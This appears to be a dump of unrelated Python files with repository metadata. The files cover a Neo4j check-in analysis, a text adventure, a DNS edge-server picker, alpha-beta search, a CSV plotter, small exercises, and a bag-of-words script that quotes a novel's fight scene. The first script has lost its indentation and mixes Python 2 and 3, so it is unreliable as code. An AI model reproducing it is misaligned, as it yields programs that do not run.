    int, matching the original). The input list is not modified.

    Fix: the original used the Python-2-only `xrange` and initialised a
    `testSet = []` that was immediately discarded; `range` works on both
    Python 2 and 3 and the dead assignment is gone. Elements are still
    popped from the end of the shuffled copy, preserving the original
    selection behaviour.
    """
    shuffled = deepcopy(userfollowData)
    shuffle(shuffled)
    trainSet = [shuffled.pop() for _ in range(int(marker))]
    # Whatever remains after the pops is the test set.
    return trainSet, shuffled
def getPrecisionAndRecall(trainSet, testSet):
    """Compute (precision, recall) of the train-set ids vs the test-set ids.

    precision = |unique train intersect unique test| / |unique train|
    recall    = |unique train intersect unique test| / |unique test|

    Fixes over the original:
    - an empty train or test set raised ZeroDivisionError; (0.0, 0.0) is
      now returned instead.
    - deduplication used O(n^2) list membership; sets are used instead.
    - the Python-2-only debug `print response,groundtruth` was removed.
    """
    response = set(trainSet)
    groundtruth = set(testSet)
    if not response or not groundtruth:
        return 0.0, 0.0
    positive = len(response & groundtruth)
    precision = float(positive) / len(response)
    recall = float(positive) / len(groundtruth)
    return precision, recall
graph = Graph()
# print "# Start getting periodmarker"
# period_marker = getGlobalPeriodmarker
# print "# Get periodmarker:",str(period_marker)
print "###########################################"
print "# Start getting Top10Users"
users = getTop10User(datasetName)
print "# Get Top10Users"
print "###########################################"
print "# Start calculating following relationship"
results = []
dirName = datasetName
w = open('/home/ytwen/exp/PrecisionAndRecall_' + dirName + '.csv','w')
z = open('/home/ytwen/exp/followRecord_' + dirName ,'w')
blist=[]
for user in users:
userID = user.strip('.csv')
# mflocation = getMFLocation(userID)
# if(mflocation == False):
# continue
if(datasetName == 'FB'):
friends = graph.cypher.execute("MATCH (n:User {id:{uid}})-[:KNOWS]->(friend) RETURN friend.id;", {"uid": userID})
elif(datasetName == 'FS'):
friends = graph.cypher.execute("MATCH (n:FSUser {id:{uid}})-[:KNOWS]->(friend) RETURN friend.id;", {"uid": userID})
elif(datasetName == 'GWL'):
friends = graph.cypher.execute("MATCH (n:GWLUser {id:{uid}})-[:KNOWS]->(friend) RETURN friend.id;", {"uid": userID})
elif(datasetName == 'CA'):
friends = graph.cypher.execute("MATCH (n:CAUser {id:{uid}})-[:KNOWS]->(friend) RETURN friend.id;", {"uid": userID})
userfollowData = []
for friend in friends:
if(datasetName == 'FB'):
visitRecords = graph.cypher.execute("MATCH (n:User {id:{friendid}})-[r:VISITED]->(p:Place) RETURN p.category,p.id,r.atTime;", {"friendid": friend['friend.id']})
elif(datasetName == 'FS'):
visitRecords = graph.cypher.execute("MATCH (n:FSUser {id:{friendid}})-[r:VISITED]->(p:FSPlace) RETURN p.category,p.id,r.atTime;", {"friendid": friend['friend.id']})
elif(datasetName == 'GWL'):
visitRecords = graph.cypher.execute("MATCH (n:GWLUser {id:{friendid}})-[r:VISITED]->(p:GWLPlace) RETURN p.category,p.id,r.atTime;", {"friendid": friend['friend.id']})
elif(datasetName == 'CA'):
visitRecords = graph.cypher.execute("MATCH (n:CAUser {id:{friendid}})-[r:VISITED]->(p:CAPlace) RETURN p.category,p.id,r.atTime;", {"friendid": friend['friend.id']})
isVisit = {}
fid = str(friend['friend.id'])
pids = []
distances = []
days = []
categorys = []
visiteT = []
for record in visitRecords:
# check if p.id is followed
if(record['p.id'] in isVisit):
break
else:
isVisit[record['p.id']] = 1
# get all visit records by friend of p.id, ordered by time
if(datasetName == 'FB'):
totalRecords = graph.cypher.execute("MATCH (n:User {id:{friendid}})-[r:VISITED]->(p:Place {id:{pid}}) RETURN r.atTime ORDER BY r.atTime DESC;", {"friendid": friend['friend.id'], "pid": record['p.id']})
elif(datasetName == 'FS'):
totalRecords = graph.cypher.execute("MATCH (n:FSUser {id:{friendid}})-[r:VISITED]->(p:FSPlace {id:{pid}}) RETURN r.atTime ORDER BY r.atTime DESC;", {"friendid": friend['friend.id'], "pid": record['p.id']})
elif(datasetName == 'GWL'):
totalRecords = graph.cypher.execute("MATCH (n:GWLUser {id:{friendid}})-[r:VISITED]->(p:GWLPlace {id:{pid}}) RETURN r.atTime ORDER BY r.atTime DESC;", {"friendid": friend['friend.id'], "pid": record['p.id']})
elif(datasetName == 'CA'):
totalRecords = graph.cypher.execute("MATCH (n:CAUser {id:{friendid}})-[r:VISITED]->(p:CAPlace {id:{pid}}) RETURN r.atTime ORDER BY r.atTime DESC;", {"friendid": friend['friend.id'], "pid": record['p.id']})
# get all visit records by user of p.id
if(datasetName == 'FB'):
userVisitRecords = graph.cypher.execute("MATCH (n:User {id:{userid}})-[r:VISITED]->(p:Place {id:{pid}}) RETURN r.atTime;", {"userid": userID, "pid": record['p.id']})
elif(datasetName == 'FS'):
userVisitRecords = graph.cypher.execute("MATCH (n:FSUser {id:{userid}})-[r:VISITED]->(p:FSPlace {id:{pid}}) RETURN r.atTime;", {"userid": userID, "pid": record['p.id']})
elif(datasetName == 'GWL'):
userVisitRecords = graph.cypher.execute("MATCH (n:GWLUser {id:{userid}})-[r:VISITED]->(p:GWLPlace {id:{pid}}) RETURN r.atTime;", {"userid": userID, "pid": record['p.id']})
elif(datasetName == 'CA'):
userVisitRecords = graph.cypher.execute("MATCH (n:CAUser {id:{userid}})-[r:VISITED]->(p:CAPlace {id:{pid}}) RETURN r.atTime;", {"userid": userID, "pid": record['p.id']})
# get p.id catgory
if(datasetName == 'FB'):
q = graph.cypher.execute("MATCH (p:Place {id:{pid}}) RETURN p.category",{"pid": record['p.id']})
elif(datasetName == 'FS'):
q = graph.cypher.execute("MATCH (p:FSPlace {id:{pid}}) RETURN p.category",{"pid": record['p.id']})
elif(datasetName == 'GWL'):
q = graph.cypher.execute("MATCH (p:GWLPlace {id:{pid}}) RETURN p.category",{"pid": record['p.id']})
elif(datasetName == 'CA'):
q = graph.cypher.execute("MATCH (p:CAPlace {id:{pid}}) RETURN p.category",{"pid": record['p.id']})
if (len(q) > 0):
cate = q[0]['p.category']
else:
cate = 'no category'
for userVisitRecord in userVisitRecords:
# get each user visit record time of p.id
userVisitTime = float(userVisitRecord['r.atTime'])
for totalR in totalRecords:
if(userVisitTime > float(totalR['r.atTime'])):
interval = int(float(userVisitTime)) - int(float(totalR['r.atTime']))
toDay = interval / 86400
# if(datasetName == ''):
# locData = graph.cypher.execute("MATCH (p:Place {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": record['p.id']})
# elif(datasetName == 'FS'):
# locData = graph.cypher.execute("MATCH (p:FSPlace {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": record['p.id']})
# elif(datasetName == 'GWL'):
# locData = graph.cypher.execute("MATCH (p:GWLPlace {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": record['p.id']})
# elif(datasetName == 'CA'):
# locData = graph.cypher.execute("MATCH (p:CAPlace {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": record['p.id']})
# dis=distance_on_unit_sphere(float(mflocation[0]), float(mflocation[1]), float(locData[0]['p.latitude']), float(locData[0]['p.longitude']))
pids.append(record['p.id'])
# distances.append(dis)
days.append(toDay)
categorys.append(cate)
visiteT.append(userVisitTime)
#each following relationship record json format:
#fid = 123456
#pids = [1,2,3,4,5,6,7,8,9]
#days = [9,8,7,6,5,4,3,2,1]
#diss = [5,5,5,5,5,5,5,5,5]
#d = {'fid':fid,'pids':pids,'diss':diss,'days':days}
#alld = [], alled.append(d), json.dumps(alld)
userfollowData.append(fid)
break
c = len(pids)
# followData = {'fid':str(fid),'pid':pids,'dis':distances,'day':days,'category':categorys,'visited Time':visiteT,'count':c}
# followData = {'fid':str(fid),'count':c}
# if(c>0):
# userfollowData.append(followData)
# print userfollowData
userfollowDic = {}
for r in userfollowData:
if r not in userfollowDic:
userfollowDic[r] = 1
else:
userfollowDic[r] = userfollowDic[r] + 1
sorted_userfollowDic = sorted(userfollowDic.items(), key=operator.itemgetter(1), reverse=True)
alist = []
alist.append({'user':userID})
for item in sorted_userfollowDic:
a={'id':str(item[0]),'count':str(item[1])}
alist.append(a)
blist.append(alist)
# print len(userfollowData)
# print userfollowData
print "Finish calculating following relationship of user:",userID
print "###########################################"
marker = 0.7*len(userfollowData)
pandrList=[]
if len(userfollowData) >= 2:
for i in xrange(5):
print "Start sampling data into 70:30 and calculating Precision And Recall # ",i
newset = randomSampleData(userfollowData,marker)
trainSet = newset[0]
testSet = newset[1]
pandr = getPrecisionAndRecall(trainSet,testSet)
pandrList.append(pandr)
s = ''
for i in pandrList:
s = s + str(i[0]) + ',' + str(i[1])+ ','
w.write(str(userID) + ',' + s + '\n')
else:
print 'No following relationship of user:',userID
z.write(json.dumps(blist))
print "-------------------------------------------"
print "# Finish calculating following relationship"
print "###########################################"
w.close()
print "Finish saving result at:"+"/home/ytwen/exp/PrecisionAndRecall_" + dirName + ".csv"
| [
"moonorblue@gmail.com"
] | moonorblue@gmail.com |
bb32c9b355ff5984723a6f55c49c36cdbc32e17c | da280a226bbf15d7243410c0d3930bdca00d0088 | /firsttry/ex41.py | 0ba10ceba34cd4003844fa210c2ed0733881e028 | [] | no_license | c4collins/PyTHWay | 174cae57c73431ce5bfc90a361613c5db5c846d7 | 135b4b908ef2698084ee1b3fb9f1e5550c3c8843 | refs/heads/master | 2021-01-10T18:29:43.998528 | 2012-11-03T22:53:17 | 2012-11-03T22:53:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,767 | py | from sys import exit
from random import randint
def death():
quips = ["You died. You kinda suck at this.", "Your mum would be proud, if she were smarter.", "Such a loser.", "I have a small puppy that's better at this."]
print quips[randint(0, len(quips)-1)]
exit(1)
def princess_lives_here():
print "You see a beautiful princess with a shiny crown."
print "She offers you some cake."
eat_it = raw_input("> ")
if eat_it == "eat it":
print "You explode like a pinata full of frogs."
print "The princess cackles and eats the frogs. Yum!"
return 'death'
elif eat_it == "do not eat it":
print "She throws the cake at you and it cuts off your head."
print "The last thing you see if her munching on your torso. Yum!"
return 'death'
elif eat_it == "make her eat it":
print "The princess screams as you cram the cake in her mouth."
print "The she smiles and cries and thanks you for saving her."
print "She points to a tiny door and says, 'The Koi needs cake too.'"
print "She gives you the very last bit of cake and shoves you in."
return 'gold_koi_pond'
else:
print "The princess looks at you confused and just points at the cake."
return 'princess_lives_here'
def gold_koi_pond():
    """Koi pond room: prompt the player and return the next room key.

    Fixes: the fall-through branch returned 'golden_koi_pond', which is
    not a key of the ROOMS map and raised KeyError in runner(); it now
    returns 'gold_koi_pond'. Python-2-only `print` statements replaced by
    parenthesised calls (identical output on Python 2, valid Python 3).
    NOTE(review): `raw_input` is still Python-2-only.
    """
    print("There is a garden with a koi pond in the centre.")
    print("You walk close and see a massive fin poke out.")
    print("You peek in and a creepy looking huge Koi stares at you.")
    print("It opens its mouth waiting for food.")
    feed_it = raw_input("> ")
    if feed_it == "feed it":
        print("The Koi jumps up, and rather than eating the cake, eats your arm.")
        print("You fall in and the Koi shrugs then eats you.")
        print("You are then pooped out sometime later.")
        return 'death'
    elif feed_it == "do not feed it":
        print("The Koi grimaces, then thrashes around for a second.")
        print("If rushes to the other side of the pong, braces against the wall...")
        print("The it *lunges* out of the water, up in the air and over your")
        print("entire body, cake and all.")
        print("You are pooped out about a week later.")
        return 'death'
    elif feed_it == "throw it in":
        print("The Koi wiggles, then leaps into the air to eat the cake.")
        print("You can see it's happy, it gruts, thrashes...")
        print("and finally rolls over and poops a magic diamond into the air.")
        print("It lands at your feet.")
        return 'bear_with_sword'
    else:
        # Any other input re-enters this room (was the broken
        # 'golden_koi_pond' key).
        print("The Koi gets annoyed and wiggles a bit.")
        return 'gold_koi_pond'
def bear_with_sword():
    """Bear room: prompt the player and return the next room key.

    Fix: Python-2-only `print` statements replaced by parenthesised
    calls (identical output on Python 2, valid Python 3). NOTE(review):
    `raw_input` is still Python-2-only.
    """
    print("Puzzled, you are about to pick up the fish poop diamond when")
    print("a bear bearing a load bearing sword walks in.")
    print("\"Hey, that's MY diamond! Where'd you get that!?\"")
    print("It holds its paw out and looks at you.")
    give_it = raw_input("> ")
    if give_it == "give it":
        print("The bear swipes at your hand to grab the diamond and")
        print("rips your hand off in the process. It then looks at")
        print("your bloody stump and says \"Oh crap, sorry about that.\"")
        print("It tries to put your hand back on, but you collapse.")
        print("The last thing you see is the bear shrug and eat you.")
        return 'death'
    elif give_it == "say no":
        print("The bear looks shocked. Nobody ever told a bear")
        print("with a broadsword 'no'. It asks, ")
        print("\"Is it because it's not a katana? I could go get one!\"")
        print("It then runs off and you notice a big iron gate.")
        print("\"Where the hell did that come from?\" You say.")
        return 'big_iron_gate'
    else:
        # Any other input re-enters this room.
        print("The bear looks puzzled as to why you'd do that.")
        return 'bear_with_sword'
def big_iron_gate():
    """Gate room: prompt the player and return the next room key.

    Fix: Python-2-only `print` statements replaced by parenthesised
    calls (identical output on Python 2, valid Python 3). NOTE(review):
    `raw_input` is still Python-2-only.
    """
    print("You walk up to the big iron gate and see there's a handle.")
    open_it = raw_input("> ")
    if open_it == "open it":
        print("You open it and you are free!")
        print("There are mountains. And berries! And...")
        print("Oh, but then the bear comes with his katana and stabs you.")
        print("\"Who's laughing now!? Love this katana.\"")
        return 'death'
    else:
        # Any other input re-enters this room.
        print("That doesn't seem sensible. I mean, the door's right there.")
        return 'big_iron_gate'
ROOMS = {'death': death, 'princess_lives_here': princess_lives_here, 'gold_koi_pond': gold_koi_pond, 'big_iron_gate': big_iron_gate, 'bear_with_sword': bear_with_sword}
def runner(map, start):
    """Drive the game loop: look up the current room handler in `map`,
    run it, and follow the key it returns. Loops until a handler exits
    the process (via death()).

    Fixes: the Python-2-only `print` statement was replaced by a
    parenthesised call (identical output on Python 2, valid Python 3),
    and the local `next` no longer shadows the builtin. The `map`
    parameter name is kept to preserve the call signature.
    """
    current = start
    while True:
        room = map[current]
        print("\n--------")
        current = room()
runner(ROOMS, 'princess_lives_here')
| [
"connor.collins@gmail.com"
] | connor.collins@gmail.com |
cd1da68ea2ca02203874dafaf7c014fc917f182e | 30e0dfc86f3593cbdd8d0366396b2bb7bf2943bd | /Functional features/DNSlogic.py | 478251c4d93583a70ff4a655d0f24081f062a731 | [
"MIT"
] | permissive | dhanraj-vedanth/IaaS_VPC_CDN | f5a8a7c26ec8eb77593c7b3f7b7372972205b1cb | 262dbc7db63d5e76398dadc8015256fb37986e36 | refs/heads/main | 2022-12-31T23:05:47.073903 | 2020-10-17T04:08:20 | 2020-10-17T04:08:20 | 304,781,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 904 | py | import json
import paramiko
import sys
import ipaddress
import re
import os
Content = sys.argv[1]
my_DNS = sys.argv[2]
#Hyp_var="H2"
#Content="rfc_9"
def Edge_Server():
    """Pick the edge-server IP that should serve the global `Content` for
    the resolver identified by the global `my_DNS`.

    Reads the content -> edge-server mapping published in
    /home/root/DNS_mappings.txt and exits the process when the requested
    content has not been published.

    Fixes over the original, which did not parse:
    - `ele` was never bound (the `for` loop over the edge servers was
      missing); the loop is restored.
    - `ele.split(.)` lacked quotes around the dot separator.
    - the second `if` was missing its colon.
    - both branches tested for an odd last octet, so the 11.0.0.254
      resolver could never match anything.
    """
    with open("/home/root/DNS_mappings.txt") as f:
        mappings = json.loads(f.read())
    if Content not in mappings:
        print("File not published")
        os._exit(0)
    Edge_IP_final = None
    # NOTE(review): assumed load-balancing rule — edge servers with an odd
    # last octet are handed out by the 10.0.0.254 resolver and even ones
    # by 11.0.0.254. Confirm against the deployment's intent.
    for ele in mappings[Content]:
        last_octet = ele.split('.')[-1]
        if int(last_octet) % 2 == 1 and my_DNS == '10.0.0.254':
            Edge_IP_final = ele
        if int(last_octet) % 2 == 0 and my_DNS == '11.0.0.254':
            Edge_IP_final = ele
    return Edge_IP_final
def get_Edge_IP():
    """Thin wrapper around Edge_Server(); returns the chosen edge IP."""
    Edge_IP=Edge_Server()
    return(Edge_IP)
get_Edge_IP()
| [
"draghun@ncsu.edu"
] | draghun@ncsu.edu |
f023fd747610af991ae9a15b3121ebbb3aed6e8c | 36ca66f4b42a430445c568e558ea58dffe1d5311 | /src/helpers/alphaBeta.py | 70cef9494b34c1ea1a6755afdf1526dd4636f297 | [] | no_license | cameliapatilea/Obstruction | 7d75ab2911d774d605ee6cd424a2968057a209b7 | 1b652092c8f173e954bbe56438c46c8c759c06cf | refs/heads/master | 2022-06-09T04:57:55.592374 | 2020-05-03T18:38:42 | 2020-05-03T18:38:42 | 257,021,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,015 | py | from helpers.joc import *
# Minimax with alpha-beta pruning over a Stare (game-state) tree.
# `alpha` and `beta` are the current bounds of the search window.
def alpha_beta(alpha, beta, stare):
    """Evaluate `stare` with alpha-beta search, setting stare.scor and
    stare.stare_aleasa (the chosen child state), and return `stare`.

    `Joc` and `Stare` come from helpers.joc; `stare.adancime` is the
    remaining search depth.
    """
    # Leaf reached, or the board has no free cells left: score it with
    # the heuristic and stop recursing.
    if stare.adancime == 0 or stare.tabla_joc.verifica_tabla() is False:
        # second heuristic (active)
        stare.scor = stare.tabla_joc.estimeaza_scor2(stare.adancime)
        # first heuristic (disabled)
        # stare.scor = stare.tabla_joc.estimeaza_scor(stare.adancime)
        return stare
    if alpha > beta:
        return stare # window already invalid, prune without expanding
    # Generate the successor states for the current player.
    stare.mutari_posibile = stare.mutari_stare()
    # Turn of the player chosen from the console: this branch MAXIMISES
    # the score. NOTE(review): the original comment called this the
    # minimising player, but the code clearly takes the maximum.
    if stare.juc_curent == Joc.jucator:
        scor_curent = float('-inf')
        for mutare in stare.mutari_posibile:
            # score the child recursively
            stare_noua = alpha_beta(alpha, beta, mutare)
            if (scor_curent < stare_noua.scor):
                stare.stare_aleasa = stare_noua
                scor_curent = stare_noua.scor
            if (alpha < stare_noua.scor):
                alpha = stare_noua.scor
            if alpha >= beta:
                break  # beta cut-off
    # Otherwise it is the other player's turn: this branch MINIMISES.
    elif stare.juc_curent != Joc.jucator:
        scor_curent = float('inf')
        for mutare in stare.mutari_posibile:
            stare_noua = alpha_beta(alpha, beta, mutare)
            if (scor_curent > stare_noua.scor):
                stare.stare_aleasa = stare_noua
                scor_curent = stare_noua.scor
            if (beta > stare_noua.scor):
                beta = stare_noua.scor
            if alpha >= beta:
                break  # alpha cut-off
    # Propagate the chosen child's score up to this state.
    stare.scor = stare.stare_aleasa.scor
    return stare
"cami.patilea@gmail.com"
] | cami.patilea@gmail.com |
bea2f7dc4aaf162e5f9e13d362e2ce51dc1dc003 | 9a633645e5e2c02095c670f41789e72a06851145 | /graph.py | 0a597f8d666726172c86dfbd216db5c0068e44be | [
"MIT"
] | permissive | scimusmn/energy_tools | 558ac316ceb339a6a8ac9831be9ec846d6485b04 | ba9d26a823588e793f8c1ef4d79b9289ef32511e | refs/heads/master | 2016-08-07T20:36:27.258222 | 2013-12-09T15:39:54 | 2013-12-09T15:39:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,696 | py | """Graph CSV energy data
Usage:
graph.py <input_file>
graph.py (-h | --help)
graph.py --version
Options:
-h --help Show this help.
--version Show version number.
"""
import csv

import dateutil
import dateutil.parser
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
from docopt import docopt
def getColumn(filename, column):
    """Return every value of a single zero-indexed *column* from a CSV file.

    The whole file is re-read on each call, so call once per needed column.
    """
    # 'with' guarantees the handle is closed (the original leaked it and
    # used the 'rU' mode removed in Python 3.11).
    with open(filename, 'r') as csv_file:
        return [row[column] for row in csv.reader(csv_file)]
def make_graph(input_file):
    """Plot the buy price (column 5) of an energy CSV against time (column 4).

    The file is expected to have three header rows and ISO-8601 datetimes.
    Displays the plot in a blocking window; returns None.
    """
    dates = []
    buy = []
    # Read the CSV inside 'with' so the handle is closed (original leaked it).
    with open(input_file, 'r') as csv_file:
        reader = csv.reader(csv_file)
        # Skip the three header rows.
        for _ in range(3):
            next(reader)
        for line in reader:
            # ISO datetime string -> Python datetime -> matplotlib float date.
            python_datetime = dateutil.parser.parse(line[4])
            dates.append(mdates.date2num(python_datetime))
            buy.append(line[5])
    # Create figure and line subplots
    fig, ax = plt.subplots()
    ax.plot(dates, buy)
    # Tick at every year and label ticks with the four-digit year.
    years = mdates.YearLocator()
    ax.xaxis.set_major_locator(years)
    yearsFmt = mdates.DateFormatter('%Y')
    ax.xaxis.set_major_formatter(yearsFmt)
    # Show a full ISO timestamp in the interactive coords read-out.
    ax.format_xdata = mdates.DateFormatter('%Y-%m-%dT%H:%M:%S')
    # Tilt, right-align and pad the x-axis date labels.
    fig.autofmt_xdate()
    plt.show()
if __name__ == "__main__":
args = docopt(__doc__, version='Graph 0.1')
make_graph(args['<input_file>'])
| [
"bkennedy@smm.org"
] | bkennedy@smm.org |
faa87c8e3f067bcd7755c759e47e022742482bb8 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /wbhjXmdbPSxCSE5hW_0.py | e9536e0fed2a7c9b48f0291977cccbacbce5b686 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,262 | py | """
A magic sigil is a glyph which represents a desire one wishes to manifest in
their lives. There are many ways to create a sigil, but the most common is to
write out a specific desire (e.g. " _I HAVE WONDERFUL FRIENDS WHO LOVE ME_ "),
remove all vowels, remove any duplicate letters (keeping the last occurence),
and then design a glyph from what remains.
Using the sentence above as an example, we would remove duplicate letters:
AUFRINDSWHLOVME
And then remove all vowels, leaving us with:
FRNDSWHLVM
Create a function that takes a string and removes its vowels and duplicate
letters. The returned string should not contain any spaces and be in
uppercase.
### Examples
sigilize("i am healthy") ➞ "MLTHY"
sigilize("I FOUND MY SOULMATE") ➞ "FNDYSLMT"
sigilize("I have a job I enjoy and it pays well") ➞ "HVBJNDTPYSWL"
### Notes
* For duplicate letters the **last one** is kept.
* When performing actual sigil magic, you **must** make your sigils **manually**.
* Check the **Resources** tab for more info on sigils if you're interested in the concept.
"""
def sigilize(desire):
a = ''.join(desire.upper().split())
b = sorted(set(a), key=a.rindex)
return ''.join(i for i in b if i not in "AEIOU")
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
23ac4abf067cb4bdc841275060af4632c5eb1301 | 6363796701067d429a2c8503bb27ae9427abc8ec | /Bioinformatics_Armory/ini.py | 3c0187bec23cd087043340933358fc0a2300528d | [] | no_license | ajiehust/rosalind | d6959603e78997f731a4fae9a9482b4327cb1d6f | c2a35f782e0251a2fbbe32462e4d8efbaa6b9083 | refs/heads/master | 2021-01-25T07:28:11.364093 | 2015-09-25T22:26:34 | 2015-09-25T22:26:34 | 41,969,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Problem Title: Introduction to the Bioinformatics Armory
Rosalind/Bioinformatics Armory
URL: http://rosalind.info/problems/ini/
solution by James Hu@Tue
'''
import sys
def main():
    """Read a DNA string from the file ``ini`` and write the counts of
    'A', 'C', 'G' and 'T' (space-separated, in that order) to ``ini.out``.
    """
    with open("ini") as f:
        seq = f.readline().strip()
    counts = " ".join(str(seq.count(base)) for base in ['A', 'C', 'G', 'T'])
    # Write to the output file directly instead of permanently redirecting
    # sys.stdout (the original hijacked stdout and leaked the file handle);
    # this also replaces the Python-2-only print statement.
    with open("ini.out", "w") as out:
        out.write(counts + "\n")
if __name__ == '__main__':
    # Entry point: run the nucleotide counter when executed as a script.
    main()
| [
"ajiehust@gmail.com"
] | ajiehust@gmail.com |
b9d27a322823a74e466788ce86d43eb3fa4cc1f7 | 686244a1cfd759521f8c0f216fd2f029eee8f758 | /Practice/Text_Visualization/bag_of_words_model.py | 10ae666412cbf8a3093e2f23fcf231ade9af43bc | [] | no_license | Amal-Krishna/Project | be0341b5ee1daa510d1751e8190f154d300491e8 | 0d70934b7cfaa5d255f55628461cce2802e6ab89 | refs/heads/master | 2022-01-07T05:22:46.095961 | 2019-04-29T13:55:52 | 2019-04-29T13:55:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,429 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 13 16:50:02 2019
@author: amalk
"""
import nltk
import re
import heapq
import numpy as np
text = """ Ishaan's scream drowned out the
stadium din on the TV. I had shifted up to a sofa from the floor.
`Huh?' I said. We were in Ishaan's house — Ishaan, Omi and I. Ishaan's mom
had brought in tea and khakra for us. 'It is more comfortable to snack on the
sofa. That is why I moved.'
`Tendulkar's gone. Fuck, now at this stage. Omi, don't you dare move now.
Nobody moves for the next five overs.'
I looked at the TV. We were chasing 283 to win. India's score a ball ago was
256-2 after forty-five overs. Twenty-seven runs in five overs, with eight wickets to
spare and Tendulkar on the crease. A cakewalk. The odds were still in India's
favour, but Tendulkar was out. And that explained the frowns on Ishaan's
forehead.
'The khakra's crispy,' Omi said. Ishaan glared at Omi, chiding him for his
shallow sensory pleasure in a moment of national grief. Omi and I kept our tea
cups aside and looked suitably mournful.
The crowd clapped as Tendulkar made his exit. Jadeja came to the crease and
added six more runs. End of forty-six overs, India 262/3. Twenty-one more runs
to win in four overs, with seven wickets in hand.
Over 46
'He made 122. The guy did his job. Just a few final closing shots left. Why are
you getting so worked up?' I asked during a commercial break. I reached for my
tea cup, but Ishaan signalled me to leave it alone. We were not going to indulge
until the fate of the match was decided. Ishaan was pissed with us anyway. The
match was in Vadodra, just two hours away from Ahmedabad. But we could not
go - one, because we didn't have money, and two, because I had my
correspondence exams in two days. Of course, I had wasted the whole day
watching the match on TV instead, so reason number two did not really hold
much weight.
'It is 5.25 runs required per over,' I said, not able to resist doing a
mathematical calculation. That is one reason I like cricket, there is so much
maths in it.
'You don't know this team. Tendulkar goes, they panic. It isn't about the
average. It is like the queen bee is dead, and the hive loses order,' Ishaan said.
Omi nodded, as he normally does to whatever Ishaan has to say about cricket.
'Anyway, I hope you realise, we didn't meet today to see this match. We have to
decide what Mr Ishaan is doing about his future, right?' I said.
Ishaan had always avoided this topic ever since he ran away from NDA a year
ago. His dad had already sarcastically commented, 'Cut a cake today to celebrate
one year of your uselessness.'
However, today I had a plan. I needed to sit them down to talk about our lives.
Of course, against cricket, life is second priority.
'Later,' Ishaan said, staring avidly at a pimple cream commercial.
'Later when Ishaan? I have an idea that works for all of us. We don't have a lot
of choice, do we?'
'All of us? Me, too?' Omi quizzed, already excited. Idiots like him love to be part
of something, anything. However, this time we needed Omi.
'Yes, you play a critical role Omi. But later when Ish? When?'
'Oh, stop it! Look, the match is starting. Ok, over dinner. Let's go to Gopi,' Ish
said.
'Gopi? Who's paying?' I was interrupted as the match began.
Beep, beep, beep. The horn of a car broke our conversation. A car zoomed
outside the pol.
'What the hell! I am going to teach this bastard a lesson,' Ish said, looking out
the window.
'What's up?'
'Bloody son of a rich dad. Comes and circles around our house everyday'
'Why?' I said.
'For Vidya. He used to be in coaching classes with her. She complained about
him there too,' Ish said.
Beep, beep, beep, the car came near the house again.
'Damn, I don't want to miss this match,' Ish said as he saw India hit a four. Ish
picked up his bat. We ran out the house. The silver Esteem circled the pol and
came back for another round of serenading. Ish stood in front of the car and
asked the boy to stop. The Esteem halted in front of Ish. Ish went to the driver,
an adolescent.
'Excuse me, your headlight is hanging out.'
'Really?' the boy said and shut off the ignition. He stepped outside and came to
the front.
Ish grabbed the boy's head from behind and smashed his face into the bonnet.
He proceeded to strike the headlight with his bat. The glass broke and the bulb
hung out.
'What's your problem,' the boy said, blood spurting out of his nose.
'You tell me what's up? You like pressing horns?' Ish said.
Ish grabbed his collar and gave six non-stop slaps across his face. Omi picked
up the bat and smashed the windscreen. The glass broke into a million pieces.
People on the street gathered around as there is nothing quite as entertaining as
a street fight.
The boy shivered in pain and fear. What would he tell his daddy about his
broken car and face?
Ish's dad heard the commotion and came out of the house. Ish held the boy in
an elbow lock. The boy was struggling to breathe.
'Leave him,' Ish's dad said.
Ish gripped him tighter.
'I said leave him,' Ish's dad shouted, 'what's going on here?'
'He has been troubling Vidya since last week,' Ish said. He kicked the boy's face
with his knee and released him. The boy kneeled on the floor and sucked in air.
The last kick from Ish had smeared the blood from his nose across his face.
'And what do you think you are doing?' Ish's dad asked him.
'Teaching him a lesson,' Ish said and unhooked his bat stuck in the
windscreen.
"""
# Pre-processing: split the corpus into sentences, lower-case each one,
# replace non-word characters with spaces and collapse whitespace runs.
dataset = nltk.sent_tokenize(text)
for idx in range(len(dataset)):
    cleaned = dataset[idx].lower()
    cleaned = re.sub(r'\W', ' ', cleaned)
    dataset[idx] = re.sub(r'\s+', ' ', cleaned)
# Build a word-frequency histogram across all tokenized sentences.
# dict.get replaces the redundant `word not in word2count.keys()` scan.
word2count = {}
for data in dataset:
    for word in nltk.word_tokenize(data):
        word2count[word] = word2count.get(word, 0) + 1
#creating most frequent word list
# Keep the 325 highest-count words as the bag-of-words vocabulary.
freq_words = heapq.nlargest(325,word2count,key=word2count.get)
#creating the BOW model
# One binary vector per sentence: element k is 1 iff vocabulary word k occurs
# in the sentence.  Tokenize each sentence once (the original re-tokenized it
# for every vocabulary word) and use a set for O(1) membership tests.
X = []
for data in dataset:
    tokens = set(nltk.word_tokenize(data))
    X.append([1 if word in tokens else 0 for word in freq_words])
#creating a 2d array
# Stack the per-sentence vectors into a (num_sentences, 325) matrix.
X2 = np.asarray(X)
| [
"amalkrishna0736@gmail.com"
] | amalkrishna0736@gmail.com |
